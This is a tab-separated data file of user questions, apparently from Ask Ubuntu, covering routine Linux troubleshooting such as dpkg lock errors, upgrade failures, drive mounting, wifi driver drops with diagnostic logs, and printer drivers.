367400	how do i resolve a lock problem in gnome ?	i have an awful lot of problems on my system , but this seems to be the starting point . so i 'd like to start with it , i 'll ask the rest later . whenever i 'm trying to perform a command , i get a message : e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i tried the thread called > how do i fix a âcould not get lock /var/lib/dpkg/lockâ problem ? < and executed the commands : sudo rm /var/lib/apt/lists/lock which results in a : rm : can not remove `/var/lib/apt/lists/lock ' : no such file or directory user @ user-laptop : ~ $ when i tried : sudo fuser -cuk /var/lib/dpkg/lock ; sudo rm -f /var/lib/dpkg/lock it froze my system solid . so , any ideas ? thank you very much ! note : i 'm a complete beginner in terms of linux , i have no idea how it works , so please , give me a grandma explanation , as much as possible . thank you
367403	upgrade from 13.04 to 13.10 failed - can not log in to any account	upgraded from 13.04 to 13.10 by web download . upgrade appeared to go ok with no problems , however , whenever i try to log in to an account the screen either goes black or breaks up . when i reboot , 13.10 fires up ok and gives me the log in screen but i can not get any further . anyone know what i can do ?
367409	nginx unable to connect	i am referring to this link to install nginx on ubuntu : installing nginx with php5 ( and php-fpm ) and mysql support ( lemp ) on ubuntu 13.04. sudo su â runs ok. apt-get install mysql-server mysql-client mysql-client is already the newest version . mysql-server is already the newest version . yet when i try http : //localhost on firefox it does not show the welcome page . ( that is nginx is not running ) . unable to connect firefox ca n't establish a connection to the server at localhost .
367413	how long does it take to install ubuntu 13.04	i am trying to install ubuntu 13.04 after an upgrade t ubuntu 13.10 ( 13.10 not compatible with zend server/apache 2.2 ) it seems after the 'preparing to install screen the installation just sitting there , nothing happens '' but busy indicator spinning ... no error msg ? ?
367415	drivers for my laptop	now i am thinking of completely removing my windows 7 and switching over to ubuntu . i have a query that whether i will have to install drivers for my laptop ( eg.sound , wireless , lan etc ) . i use a lenovo g570 laptop . core i5 second generation . please help me out .
367416	what 's the best way to upgrade ubuntu ?	i know this question is subjective , but i 'll ask : i 've read about various fails during upgrading to the newest version of ubuntu . ( i.e . from raring to saucy ) that 's why i want to know : what is the safest way to upgrade ? i 've found the following methods : sudo do-release-upgrade using the provided gui upgrader ( which i guess uses do-release-upgrade ) burn a dvd/make a bootstick with the new version and upgrade via installer . please add other methods , if there are any . i 'd like to have explained answers , and not `` way x is the best ! '' . again : i know it 's subjective , but i think there are many people with the same question so i think is worth an answer . ps : i do n't want to do a reinstallation .
367417	problems auto-mounting 2nd hard drive	just did a fresh install of ubuntu 12.04 and decided to try something new . i have 1tb internal hard drive that i use for storage . i found a guide to mounting it , and have followed it , here 's my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdc1 during installation uuid=34b6be44-858b-42dc-a730-08ea8f622ef6 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdc5 during installation # uuid=835004e4-cfab-4d20-b4f8-27327d8ce6ef none swap sw 0 0 # swap was on /dev/sdd5 during installation # uuid=d0a5e5b8-c644-465a-82ab-46e561c19f9c none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 /dev/mapper/cryptswap2 none swap sw 0 0 uuid=697a-2902 /home/nicola/storage/ vfat uid=1000 , gid=1000 , umask=0022 , sync , auto , rw 0 0 i rebooted and was amazed to see storage pop up as mounted , as well as in my home directory . here 's the issue though , when i open it , it appears empty . i have checked the code and it seems to be correct , what could be causing this ? any help would be greatly appreciated
367422	need to resolve dependencies for installation	i 'm trying to install librhythmbox-core8 but when i run the commands it fails . apt-get install reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : gir1.2-rb-3.0 : depends : librhythmbox-core8 ( > = 3.0.1 ) but it is not installed rhythmbox : depends : librhythmbox-core8 ( = 3.0.1-1ubuntu2~ppa0 ) but it is not installed rhythmbox-plugin-cdrecorder : depends : librhythmbox-core8 ( > = 3.0 ) but it is not installed rhythmbox-plugins : depends : librhythmbox-core8 ( = 3.0.1-1ubuntu2~ppa0 ) but it is not installed e : unmet dependencies . try using -f. apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : gir1.2-gconf-2.0 gir1.2-zeitgeist-2.0 python3-mako python3-markupsafe rhythmbox-plugins use 'apt-get autoremove ' to remove them . the following extra packages will be installed : librhythmbox-core8 the following new packages will be installed : librhythmbox-core8 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 6 not fully installed or removed . need to get 0 b/816 kb of archives . after this operation , 1,825 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 259967 files and directories currently installed . ) unpacking librhythmbox-core8 ( from ... /librhythmbox-core8_3.0.1-1ubuntu2~ppa0_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/librhythmbox-core8_3.0.1-1ubuntu2~ppa0_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core7 3.0.1-0~13.10~ppa1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librhythmbox-core8_3.0.1-1ubuntu2~ppa0_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can someone help me fix this ?
367423	error in line 56 ( malformed line )	just installed xubuntu 12.04 . i ca n't update or open the software manager . no idea how to edit lines and the like , but here 's my issue when i examine the coding in the terminal . any help would be greatly appreciated . the error is e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) . http : //pastebin.com/r3ai2ayh
367426	netgear wnda3100v2 does not work on ubuntu 13.10 install	it seems like there is no driver that is automatically included for it . my wna1100 works great though .
367427	xara lx wo n't launch in 13.10	i installed the package 'xaralx ' via apt-get on xubuntu 13.10 saucy 64-bit and i get this when i type in `` xaralx '' at the command prompt : xaralx : relocation error : xaralx : symbol _ztv19wxgnomeprintfactory , version wxu_2.8 not defined in file libwx_gtk2u_core-2.8.so.0 with link time reference i uninstalled xaralx and installed xaralx : i386 and i get the same error . my system started out with 12.04 lts and i upgraded it all the way up to 13.10 , so that might have something to do with it .
367433	elastic windows effect in 13.10	i had this effect activated on 13.04 but i ca n't see any option to enable it in compizconfig settings manager . i 'm running 64-bit ubuntu 13.10
367438	share ssh session at login	hi there im trying to give some support for a co-workers im making a reverse ssh tunnel from remote machine to one of my cloud servers . i want to control remote machine with the reverse tunnel but at the same time to share the session to the remote user so they can see what im doing buy i want to do this automatically when i login to the reverse connection . is there away to do this ?
367439	codec support to play mp3	i have installed ubuntu-restricted-extras but still mp3 format ca n't be played through rhythmbox the error coming is : required plugin is not found : : rhythmbox requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder
367441	touchpad acts funny after sleep	sometimes , when i wake my laptop from sleep , the touchpad acts funny . the mouse pointer jump on the screen and it is really hard to control the mouse . i tried to turn of and on the touchpad in ubuntu control center , hoping this will unload and load the module and it did n't help . restarting the machine solve this .
367443	problem with shutting down in ubuntu gnome 13.04 64-bit	i have a laptop running ubuntu gnome 13.04 64-bit . whenever i click on the 'power off ' button from the menu on the top panel and then click 'power off ' , the laptop always restarts ( does not shut down ) . please help me . i also set the power button action in the gnome tweak tool to 'shutdown ' . also , this does not happen everytime . i think it might be some bug .
367445	how can i install a canon printer driver for mp495	hi i 'm a complete newbie to linux . i am running ubuntu 13.04 . i am trying to install a canon pixma mp495 wireless printer . i have downloaded the canon printer driver from the canon european site but can not install the driver . can anybody help ?
367449	internet connection issue with rtl8192ce / toshiba satellite / realtek wireless card	**update- i tried turning off the wireless card firmware power saving feature and now i stay connected when i 'm within approximately 15 ft of the router . prior to switching to ubuntu i had reliable connection at least twice that far and all of my other wifi items still connect at beyond 30 ft . prior to disabling the firmware power saving feature i could not stay connected within close proximity to the router . because this seems to have helped i am going to look for the instructions i saw on how to disable another power saving feature for the wireless card . i 'll post both the command that i used already and the other command once i find them again- they were both in the same post . **update : the commands i ran were : sudo modprobe -v rtl8192ce ips=0 fwlps=0 ... .but they do n't seem to get a reliable signal from more than about 15 feet from the router . again , numerous other wifi devices get the signal over 30 feet away and this computer did as well until ubuntu . i will need to keep at this until i find a fix because i ca n't only use my laptop in the room with the router . : ) i 'm less than 24 hours into linux/ubuntu . i 'm on 12.04 lts . ( when this was first posted ) i can connect to the internet just fine at first . but within somewhere between 2 minutes and 20 minutes i am no longer able to view new web pages although i still seem to be connected to the router . disconnecting and reconnecting fixes every time . i ran a few things that it seems likely will be asked of me having looked at other similar posts . please let me know if you need anything else . nathaniel @ nathaniel-satellite-c875 : ~ $ modinfo rtl8192ce filename : /lib/modules/3.8.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko firmware : rtlwifi/rtl8192cfwu_b.bin firmware : rtlwifi/rtl8192cfwu.bin firmware : rtlwifi/rtl8192cfw.bin description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : b41ec2d43683c181df50fb6 alias : pci : v000010ecd00008176sv*sd*bc*sc*i* alias : pci : v000010ecd00008177sv*sd*bc*sc*i* alias : pci : v000010ecd00008178sv*sd*bc*sc*i* alias : pci : v000010ecd00008191sv*sd*bc*sc*i* depends : rtlwifi , rtl8192c-common , mac80211 intree : y vermagic : 3.8.0-32-generic smp mod_unload modversions parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) nathaniel @ nathaniel-satellite-c875 : ~ $ lsmod | grep rtl rtl8192ce 58733 0 rtl8192c_common 49561 1 rtl8192ce rtlwifi 81225 1 rtl8192ce mac80211 630977 3 rtl8192ce , rtl8192c_common , rtlwifi cfg80211 525326 2 rtlwifi , mac80211 nathaniel @ nathaniel-satellite-c875 : ~ $ dmesg | grep rtl [ 8.417968 ] rtl8192ce : using firmware rtlwifi/rtl8192cfwu_b.bin [ 8.536512 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 8.536688 ] rtlwifi : wireless switch is on [ 66.194356 ] rtlwifi : wireless switch is on nathaniel @ nathaniel-satellite-c875 : ~ $ dmesg | grep -e rtl -e 80211 -e wlan [ 7.568257 ] cfg80211 : calling crda to update world regulatory domain [ 8.417968 ] rtl8192ce : using firmware rtlwifi/rtl8192cfwu_b.bin [ 8.536512 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 8.536688 ] rtlwifi : wireless switch is on [ 15.922653 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 15.922919 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 20.918113 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 20.949695 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 21.124423 ] wlan0 : authenticated [ 21.125057 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 21.137780 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=3 ) [ 21.137944 ] wlan0 : associated [ 21.137957 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 61.948146 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 61.984778 ] cfg80211 : calling crda for country : ec [ 66.194356 ] rtlwifi : wireless switch is on [ 68.867214 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 72.213557 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 72.245459 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 72.247442 ] wlan0 : authenticated [ 72.249150 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 72.260906 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 72.261069 ] wlan0 : associated [ 72.261079 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 264.765119 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 264.807585 ] cfg80211 : calling crda for country : us [ 272.105040 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 272.129333 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 272.134530 ] wlan0 : authenticated [ 272.136727 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 272.146802 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 272.146965 ] wlan0 : associated [ 525.021020 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 525.059848 ] cfg80211 : calling crda to update world regulatory domain [ 532.345262 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 532.374166 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 532.384738 ] wlan0 : authenticated [ 532.385642 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 532.397310 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 532.397492 ] wlan0 : associated [ 1216.554482 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 1216.592606 ] cfg80211 : calling crda for country : us [ 1223.882736 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 1223.910563 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 1223.912130 ] wlan0 : authenticated [ 1223.914939 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 1223.927597 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 1223.927763 ] wlan0 : associated [ 1454.312051 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 1454.349503 ] cfg80211 : calling crda to update world regulatory domain [ 1461.644094 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 1461.671809 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 1461.673382 ] wlan0 : authenticated [ 1461.675268 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 1461.684063 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 1461.684244 ] wlan0 : associated [ 35484.428990 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 35484.468906 ] cfg80211 : calling crda to update world regulatory domain [ 35491.759011 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 35491.780024 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 35491.782198 ] wlan0 : authenticated [ 35491.785601 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 35491.794285 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 35491.794449 ] wlan0 : associated [ 37449.699230 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 37449.736487 ] cfg80211 : calling crda for country : us [ 37457.013415 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 37457.042859 ] wlan0 : direct probe to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 37457.246099 ] wlan0 : direct probe to 5c:57:1a : d7 : e2:70 ( try 2/3 ) [ 37457.449840 ] wlan0 : direct probe to 5c:57:1a : d7 : e2:70 ( try 3/3 ) [ 37457.653569 ] wlan0 : authentication with 5c:57:1a : d7 : e2:70 timed out [ 37463.950874 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 37463.981838 ] wlan0 : direct probe to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 37464.185118 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 2/3 ) [ 37464.190428 ] wlan0 : authenticated [ 37464.193301 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 37464.207439 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 37464.207615 ] wlan0 : associated [ 37840.014512 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 37840.056904 ] cfg80211 : calling crda to update world regulatory domain [ 37841.054674 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 37841.086562 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 37841.088008 ] wlan0 : authenticated [ 37841.090148 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 37841.098872 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 37841.099053 ] wlan0 : associated [ 38211.316937 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 38211.363949 ] cfg80211 : calling crda to update world regulatory domain [ 38212.346797 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 38212.378593 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38212.581951 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 2/3 ) [ 38212.785688 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 3/3 ) [ 38212.989440 ] wlan0 : authentication with 5c:57:1a : d7 : e2:70 timed out [ 38218.936084 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 38218.966382 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38218.967921 ] wlan0 : authenticated [ 38218.969692 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38218.978328 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 38218.978481 ] wlan0 : associated [ 38526.055464 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 38526.097918 ] cfg80211 : calling crda for country : us [ 38533.389005 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 38533.413065 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38533.415046 ] wlan0 : authenticated [ 38533.415903 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38533.426599 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 38533.426760 ] wlan0 : associated [ 38696.325529 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 38700.082256 ] cfg80211 : calling crda to update world regulatory domain [ 38707.355454 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 38707.386868 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38707.582609 ] wlan0 : authenticated [ 38707.586215 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38707.618877 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 38707.619059 ] wlan0 : associated [ 38986.465625 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 38986.513453 ] cfg80211 : calling crda for country : us [ 38993.756647 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 38993.779645 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38993.784645 ] wlan0 : authenticated [ 38993.787150 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 38993.801117 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 38993.801302 ] wlan0 : associated [ 39081.401645 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 39081.454816 ] cfg80211 : calling crda to update world regulatory domain [ 39088.734718 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 39088.761295 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 39088.767490 ] wlan0 : authenticated [ 39088.768840 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 39088.777552 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 39088.777716 ] wlan0 : associated [ 39092.028037 ] wlan0 : deauthenticated from 5c:57:1a : d7 : e2:70 ( reason : 15 ) [ 39092.064711 ] cfg80211 : calling crda to update world regulatory domain [ 39093.447683 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 39093.479187 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 39093.484799 ] wlan0 : authenticated [ 39093.486795 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 39093.495490 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 39093.495659 ] wlan0 : associated [ 39897.730449 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 39897.793459 ] cfg80211 : calling crda for country : us [ 39905.060679 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 39905.086931 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 39905.089198 ] wlan0 : authenticated [ 39905.090500 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 39905.104216 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 39905.104380 ] wlan0 : associated [ 40366.542055 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 40366.589901 ] cfg80211 : calling crda to update world regulatory domain [ 40367.545515 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 40367.577591 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 40367.580260 ] wlan0 : authenticated [ 40367.581182 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 40367.589856 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 40367.590031 ] wlan0 : associated [ 42816.822883 ] wlan0 : deauthenticating from 5c:57:1a : d7 : e2:70 by local choice ( reason=3 ) [ 42816.830956 ] cfg80211 : calling crda for country : us [ 42817.418361 ] wlan0 : authenticate with 5c:57:1a : d7 : e2:70 [ 42817.449996 ] wlan0 : send auth to 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 42817.453152 ] wlan0 : authenticated [ 42817.453443 ] wlan0 : associate with 5c:57:1a : d7 : e2:70 ( try 1/3 ) [ 42817.462272 ] wlan0 : rx assocresp from 5c:57:1a : d7 : e2:70 ( capab=0xc11 status=0 aid=2 ) [ 42817.462457 ] wlan0 : associated nathaniel @ nathaniel-satellite-c875 : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 70:542:5f : f8:5e capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off - device : wlan0 [ home-e272 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8192ce state : connected default : yes hw address : 24 : ec:99 : ea:01 : f1 capabilities : speed : 65 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *home-e272 : infra , 5c:57:1a7 : e2:70 , freq 2462 mhz , rate 54 mb/s , strength 68 wpa wpa2 tonya : infra , 00:1d486:20 , freq 2412 mhz , rate 54 mb/s , strength 65 wpa wpa2 home-0ea2 : infra , 00:1d3:4f:0e : a0 , freq 2462 mhz , rate 54 mb/s , strength 67 wpa wpa2 blueskywireless : infra , 00:25:3c : c4 : ed:51 , freq 2447 mhz , rate 54 mb/s , strength 67 wpa 2wire373 : infra , 98:2c : be:06:14:49 , freq 2452 mhz , rate 54 mb/s , strength 67 wpa owner24 : infra , 00:26 : f2 : fe : ee:98 , freq 2422 mhz , rate 54 mb/s , strength 65 wpa wpa2 2wire226 : infra , 3c : ea:4f:79:34:29 , freq 2422 mhz , rate 54 mb/s , strength 72 wpa att376 : infra , b8:16:19:3f : c6 : e0 , freq 2437 mhz , rate 54 mb/s , strength 67 wpa wpa2 triqwave : infra , a0:21 : b7 : a1:3a:26 , freq 2437 mhz , rate 54 mb/s , strength 65 wpa wpa2 davis567 : infra , f8 : ed : a5 : aa:68:70 , freq 2462 mhz , rate 54 mb/s , strength 65 wpa wpa2 veganaisse_ext : infra , 20 : e5:2a:57:11:0b , freq 2412 mhz , rate 54 mb/s , strength 65 hpc410a.464f20 : ad-hoc , 02:26:26:91:94:90 , freq 2437 mhz , rate 54 mb/s , strength 65 brenda network : infra , 84 : c9 : b2:54:92 : ad , freq 2432 mhz , rate 54 mb/s , strength 67 wpa 2wire854 : infra , 60 : c3:97:42:1f:51 , freq 2452 mhz , rate 54 mb/s , strength 67 wpa wpa2 ipv4 settings : address : 10.0.0.9 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.1 dns : 75.75.75.75 dns : 75.75.76.76 this run of nm-tool ( above ) was while i had no use-able internet connection although it appears i 'm connected to the router in some way . nathaniel @ nathaniel-satellite-c875 : ~ $ iw reg get country 00 : ( 2402 - 2472 @ 40 ) , ( 6 , 20 ) ( 2457 - 2482 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 6 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 6 , 20 ) , passive-scan , no-ibss ( 57240 - 63720 @ 2160 ) , ( n/a , 0 ) nathaniel @ nathaniel-satellite-c875 : ~ $ lspci -vvvnn -d10ec : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8212 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : i/o ports at 3000 [ size=256 ] region 2 : memory at c2400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : rtl8192ce kernel modules : rtl8192ce any help would be greatly appreciated ! ! ! also , although i had some difficulty getting 12.04 to install ( had issues with grub/boot files ) i am willing to switch to 13 if it will solve this issue . regarding 13 and the 9 month support- does that mean i will have to install a new version of ubuntu in 9 months to continue getting security/other updates ? or will 13 then just become the new lts ? i know that 's a very basic question but hey , i 'm a linux noob !
367452	failed to install ubuntu 13.10 and it also corrupted my windows 7	i tried to install ubuntu 13.10 from bootable usb but it failed and it also corrupt my windows 7. then again i tried to install ubuntu it shows that i have no operating system currently . i select the first option for installation that erase data and install ( something like that ) i do it but after completion of installation it again shows the option to install ubuntu or use without installation . so , i want to ask that first thing that my all partition that i have created in window 7 will remains in exist or not ? and how to solve this problem ?
367456	can full verson ubuntu be installed on usb drive ?	i have installed ubuntu several times on my thumb drive . first times were on 8 gig thumb drives . i noticed i could not save anything as when i rebooted , it was all gone . so , i got a 30 gig drive , tried installing again.. and same thing . now i find out i am running a live version.. not actually an install . so , for the somewhat novice who can not do command-line installs , step by step is there a way to install ubuntu-12.04.3-desktop-i386.iso using , unetbootin-windows-585.exe to a 30 gig usb stick using my windows 7 machine ? i am not running intel . i love to death ubuntu , but want to be able to download and install apps and have them saved . thank you . please , post the steps.. 1.go to .. and download ... 2.use ... to install ... 3.must format usb stick ? ... . know full well how to do command line and such in windows.. just not ubuntu.. thank you . standing by , hoping someone posts this.. or even posts a link to where someone has recently addressed this.. all i could find is from 2011 , 2010 ... thanks .
367459	mouse cursor disappearing at every second boot ubuntu 13.10	since i installed ubuntu 13.10 my mouse cursor has been disappearing every second time i boot ubuntu 13.10 . so the way i solve it is by restarting ubuntu , and the mouse cursor will become visible again . if i would then want to make a restart again , the cursor will be gone until a restart has been done . so to sum up - every second boot will show a cursor , and the other will not . now of course i can keep on doing like this , but it is very annoying . so i would ask if there was a way of solving this . please do not hesitate to ask me for more information about my system if needed .
367460	mail html form data as pdf file	i have a html form with 4 checkboxes that have some price values . i want php to calculate the total values of the checked boxes and send the output as a pdf file to a mail address . so far i have been able to create a php function to calculate the total values of the checked boxes but ... the problem is i ca n't mail the output as a pdf file to a mail address . i have tried fpdf , wkhtmltopdf , htmltopdf but could n't succeed . can anyone please help me do that ? ? ? thanks in advance expecting a good and easy solution .
